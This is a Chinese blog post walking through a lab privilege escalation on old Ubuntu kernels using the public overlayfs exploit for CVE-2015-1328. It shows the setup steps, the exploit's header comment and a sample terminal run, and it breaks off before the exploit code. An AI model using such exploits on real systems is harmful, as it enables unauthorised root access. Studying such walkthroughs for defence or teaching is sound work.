记录一次针对linux的提权

最新推荐文章于 2024-02-13 08:00:00 发布

tanw923

最新推荐文章于 2024-02-13 08:00:00 发布

阅读量412

点赞数 1

分类专栏：提权方法文章标签： linux提权 Ubuntu12.04 Ubuntu14.04 入门验证

本文链接：https://blog.csdn.net/qq_40669976/article/details/98875015

版权

本文记录了一次在Ubuntu 12.04和14.04上进行的Linux提权过程。首先，通过查看内核版本发现存在本地提权漏洞。接着，作为tanw用户使用vim编写了一个开源的C程序，然后编译并运行，成功提权后，程序输出#，表明提权操作完成。最后，检查当前状态，确认提权效果。

摘要由CSDN通过智能技术生成

记录一次linux提权的方法

内核版本需3.13.0-3.19，如Ubuntu 12.04/14.04/14.10/15.04

1.实验环境下查看内核版本，该版本存在本地提权漏洞

2.whoami查看为tanw用户

3.使用vim编写以下开源代码的c程序

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)


*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT


user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads